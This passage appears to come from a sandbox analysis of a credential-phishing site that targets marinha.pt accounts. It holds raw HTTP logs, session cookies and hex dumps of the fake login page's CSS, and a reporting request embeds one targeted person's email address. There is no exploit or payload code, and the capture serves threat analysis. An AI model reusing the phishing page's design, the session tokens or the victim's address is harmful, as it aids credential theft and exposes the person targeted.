                                                                  2025-03-14 11:30:59 UTC1369INData Raw: 2e 38 32 36 20 31 2e 39 33 36 20 31 2e 32 34 35 20 33 2e 33 31 36 20 31 2e 32 34 35 20 31 2e 34 33 38 20 30 20 32 2e 35 39 33 2d 2e 34 34 31 20 33 2e 34 33 34 2d 31 2e 33 31 2e 38 34 2d 2e 38 37 20 31 2e 32 36 35 2d 32 2e 30 34 35 20 31 2e 32 36 35 2d 33 2e 34 39 33 20 30 2d 31 2e 34 33 33 2d 2e 34 2d 32 2e 35 37 33 2d 31 2e 31 38 37 2d 33 2e 33 39 34 2d 2e 37 38 39 2d 2e 38 32 2d 31 2e 38 39 37 2d 31 2e 32 33 36 2d 33 2e 32 39 35 2d 31 2e 32 33 36 4d 37 34 2e 33 37 38 20 31 31 2e 34 37 31 63 2d 2e 36 36 37 2d 2e 32 36 38 2d 31 2e 30 39 35 2d 2e 34 39 2d 31 2e 32 37 2d 2e 36 36 2d 2e 31 37 2d 2e 31 36 35 2d 2e 32 35 37 2d 2e 33 39 38 2d 2e 32 35 37 2d 2e 36 39 33 20 30 2d 2e 32 36 32 2e 31 30 38 2d 2e 34 37 32 2e 33 32 37 2d 2e 36 34 32 2e 32 31 39 2d 2e
                                                                  Data Ascii: .826 1.936 1.245 3.316 1.245 1.438 0 2.593-.441 3.434-1.31.84-.87 1.265-2.045 1.265-3.493 0-1.433-.4-2.573-1.187-3.394-.789-.82-1.897-1.236-3.295-1.236M74.378 11.471c-.667-.268-1.095-.49-1.27-.66-.17-.165-.257-.398-.257-.693 0-.262.108-.472.327-.642.219-.


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.44974135.190.80.14435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC551OUTOPTIONS /report/v4?s=u%2F2mk9jj8%2BWPHi0neXmrxvWqgI1lGSmFkhlvUS6bAaUTOwt8tjj836LHDYZIpuyTJT1GYpu5hcb9No5XWJChYS3L09u%2Bms9dilio1EjkXvgdh%2BHYKGrt6sGqO6a%2B HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Access-Control-Request-Method: POST
                                                                  Access-Control-Request-Headers: content-type
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:59 UTC336INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-max-age: 86400
                                                                  access-control-allow-methods: OPTIONS, POST
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-headers: content-length, content-type
                                                                  date: Fri, 14 Mar 2025 11:30:58 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.44974235.190.80.14435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC526OUTPOST /report/v4?s=u%2F2mk9jj8%2BWPHi0neXmrxvWqgI1lGSmFkhlvUS6bAaUTOwt8tjj836LHDYZIpuyTJT1GYpu5hcb9No5XWJChYS3L09u%2Bms9dilio1EjkXvgdh%2BHYKGrt6sGqO6a%2B HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 484
                                                                  Content-Type: application/reports+json
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:59 UTC484OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 38 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 6e 63 72 79 70 74 69 6f 6e 2d 6d 61 72 69 6e 68 61 2e 6a 6b 6e 64 66 75 7a 76 2e 72 75 2f 50 74 4d 32 69 2f 24 6e 61 64 69 61 2e 73 6f 66 69 61 2e 72 69 6a 6f 40 6d 61 72 69 6e 68 61 2e 70 74 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 33 2e 31 37 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74
                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":887,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt","sampling_fraction":1.0,"server_ip":"104.21.43.175","status_code":404,"t
                                                                  2025-03-14 11:30:59 UTC214INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-allow-origin: *
                                                                  vary: Origin
                                                                  date: Fri, 14 Mar 2025 11:30:59 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.449746104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC1382OUTGET /348mXfXab6nFv46715 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:00 UTC1071INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Content-Type: text/css;charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="348mXfXab6nFv46715"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FoSUvs606XSyPYOteO2uDZf3bNZF5xaSbgNWzmVfRJdm9DK7bygLA64mgWQjWmTgFkekxLc1Vwb46%2FXhxa5eK9IEPeGSAPSd2QIj%2BkaLy9HckQiyNIL4umDkxCPi"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5402&min_rtt=5401&rtt_var=2029&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2291&delivery_rate=525946&cwnd=251&unsent_bytes=0&cid=8e556a32b95bb3cb&ts=109&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371349a6df5f4-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1457&min_rtt=1454&rtt_var=552&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1954&delivery_rate=1968981&cwnd=157&unsent_bytes=0&cid=ee0c701cfa260124&ts=423&x=0"
                                                                  2025-03-14 11:31:00 UTC298INData Raw: 31 32 30 35 0d 0a 23 61 75 74 68 63 61 6c 6c 64 65 73 63 2c 23 73 65 63 74 69 6f 6e 73 2c 2e 74 65 78 74 2d 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 7d 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 70 64 66 68 65 61 64 65 72 20 23
                                                                  Data Ascii: 1205#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 2c 69 6e 70 75 74 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 70 2c 2e 73 75 62 74 69 74 6c 65 2c 2e 74 65 78 74 2d 62 6f 64 79 2c 2e 74 65 78 74 2d 73 75 62 74 69 74 6c 65 2c 68 34 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2a 2c 2e 74 65 78 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 52 6f 62 6f 74 6f 2c 45 62 72 69 6d 61 2c 22 4e 69 72 6d 61 6c 61 20 55 49 22 2c 47 61 64 75 67 69 2c 22
                                                                  Data Ascii: ,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 31 3b 68 65 69 67 68 74 3a 35 30 70 78 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 70 64 66 62 61 63 6b 63 6f 6e 74 61 69 6e 65 72 3e 2e 62 67 32 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 62 61 63 6b 63 6f 6e 74 61 69 6e 65 72 3e 2e 62 67 32 7b 67 72 69 64 2d 61 72 65 61 3a 62 67 32 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 34 2e 35 33 31 32 35 69 6e 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 70 64 66 62 61 63 6b 63 6f 6e 74 61 69 6e 65 72 3e 2e 62 67 33 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 62 61 63 6b 63 6f 6e 74 61 69 6e 65 72 3e 2e 62 67 33 7b 67 72 69 64 2d 61 72 65 61 3a 62 67 33 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 39 37 31 2e 32 35 70 74 3b 6d 61 72 67 69 6e 2d 6c 65 66
                                                                  Data Ascii: 1;height:50px}#sections_doc .pdfbackcontainer>.bg2,#sections_pdf .pdfbackcontainer>.bg2{grid-area:bg2;height:auto;width:4.53125in}#sections_doc .pdfbackcontainer>.bg3,#sections_pdf .pdfbackcontainer>.bg3{grid-area:bg3;height:auto;width:971.25pt;margin-lef
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 3a 2d 2e 39 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 2e 38 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 30 64 65 67 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 2e 37 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 36 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 30 64 65 67 29 3b 61
                                                                  Data Ascii: :-.9s}#sections_pdf .lds-spinner div:nth-child(4){transform:rotate(90deg);animation-delay:-.8s}#sections_pdf .lds-spinner div:nth-child(5){transform:rotate(120deg);animation-delay:-.7s}#sections_pdf .lds-spinner div:nth-child(6){transform:rotate(150deg);a
                                                                  2025-03-14 11:31:00 UTC216INData Raw: 32 35 70 63 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 39 37 30 31 30 31 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 30 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 64 66 66 61 76 69 63 6f 6e 49 6d 67 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 64 66 66 61 76 69 63 6f 6e 49 6d 67 0d 0a
                                                                  Data Ascii: 25pc;position:fixed;top:0;width:100%;color:#fff;display:flex;justify-content:space-between;background-color:#970101;z-index:1000000000}#sections_doc .pdfheader #pdffaviconImg,#sections_pdf .pdfheader #pdffaviconImg
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 31 61 34 63 0d 0a 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 70 64 66 68 65 61 64 65 72 20 2e 64 6f 63 4e 61 6d 65 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 2e 64 6f 63 4e 61 6d 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 20 61 75 74 6f 20 61 75 74 6f 20 31 30 70 78 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 70 64 66 68 65 61 64 65 72 20 2e 6c 65 66 74 4d 65 6e 75 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 2e 6c 65 66 74 4d 65 6e 75 7b 64 69 73 70
                                                                  Data Ascii: 1a4c{margin-top:auto;margin-bottom:auto;margin-left:5px}#sections_doc .pdfheader .docName,#sections_pdf .pdfheader .docName{display:block;margin:auto auto auto 10px;color:inherit}#sections_doc .pdfheader .leftMenu,#sections_pdf .pdfheader .leftMenu{disp
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 31 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 69 64 65 6c 65 62 6c 65 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 50 6c 61 79 66 61 69 72 20 44 69 73 70 6c 61 79 27 2c 73 65 72 69 66 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 63 75 72 65 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61
                                                                  Data Ascii: fy-content:center;width:100%;height:110px;border-radius:5px}#sections_pdf .login .sidelebles>span{color:#fff;text-align:left;margin:5px;font-size:14px;font-family:'Playfair Display',serif}#sections_pdf .login .secure>span{color:#fff;font-size:14px;font-fa
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 6f 6e 73 5f 64 6f 63 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 39 29 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 6c 6f 67 69 6e 20 2e
                                                                  Data Ascii: ons_doc .login .selectProvider .choseemails>span,#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:center;background-color:rgba(0,0,0,.379);padding:15px;border-radius:5px}#sections_doc .login .
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 6e 3a 66 69 78 65 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 29 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 30 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e
                                                                  Data Ascii: n:fixed;background-color:rgba(0,0,0,.37);z-index:100000}#sections_doc .allBlock{position:relative;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-direction:column;align-items:center;z-index:1000000000}#sections_doc .
                                                                  2025-03-14 11:31:00 UTC1264INData Raw: 69 7a 65 3a 30 70 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 34 70 78 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 61 63 74 69 6f 6e 2d 36 34 31 7b 6d 61 72 67 69 6e 3a 30 20 34 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 63 73 73 2d 33 32 37 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 5f 64 6f 63 20 2e 74 69 74 6c 65 2d 36 33 34 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 70 78 3b 63 6f 6c 6f 72 3a 23 32 35 32 34 32 33 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 62 6f
                                                                  Data Ascii: ize:0px;justify-content:flex-end;margin-right:-4px}#sections_doc .action-641{margin:0 4px;flex-grow:1}#sections_doc .css-327{display:flex;justify-content:flex-end;width:100%}#sections_doc .title-634{padding-bottom:4px;color:#252423;white-space:pre-line}bo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.449745104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC1378OUTGET /abvf9t8pq9ef30 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:00 UTC1068INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Content-Type: text/css;charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="abvf9t8pq9ef30"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NfqIMIVpGl%2F%2FGelyAofokkqG2eEO4w2eNmby9vAct4Ao6jdOIlXK6IsSPMi1JCkwePbG0M8hYoNVLqa%2FDD4xNZ1GQivYj6tdilwDuDaPT01MBslWM6zUfnDpyd9I"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5692&min_rtt=4846&rtt_var=1889&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2286&delivery_rate=471523&cwnd=251&unsent_bytes=0&cid=b94bedea2a482c17&ts=97&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 92037134988972c2-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1764&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1950&delivery_rate=1582655&cwnd=158&unsent_bytes=0&cid=d7740e091c529bcb&ts=416&x=0"
